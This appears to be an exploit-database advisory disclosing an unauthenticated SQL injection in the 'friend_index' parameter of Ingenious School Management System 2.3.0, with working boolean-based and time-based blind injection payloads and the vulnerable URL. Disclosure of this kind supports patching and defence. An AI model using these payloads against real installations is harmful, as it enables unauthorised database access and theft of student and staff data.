Ingenious School Management System 2.3.0 SQL Injection

2017.11.03
Credit: Giulio Comi
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Ingenious School Management System 2.3.0 - SQL injection # Date: 01.11.2017 # Vendor Homepage: http://iloveprograming.com/ # Software Link: https://www.codester.com/items/4945/ingenious-school-management-system # Demo: http://iloveprograming.com/view/login.php # Version: 2.3.0 # Category: Webapps # Tested on: Kali Linux 2.0 # Exploit Author: Giulio Comi # Contact: https://<http://ihsan.net/>linkedin.com/in/giuliocomi #Description This vulnerability allows an attacker to inject SQL commands (without authentication) in 'friend_index' GET parameter. # Proof of Concept: http://localhost/view/friend_profile.php?friend_type=Student&friend_index=[SQL_injection_payload] # Vulnerable Parameter: friend_index (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: friend_type=Student&friend_index=1' AND 2576=2576 AND 'YJeg'='YJeg Vector: AND [INFERENCE] Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: friend_type=Student&friend_index=1' AND SLEEP(5) AND 'rliO'='rliO Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top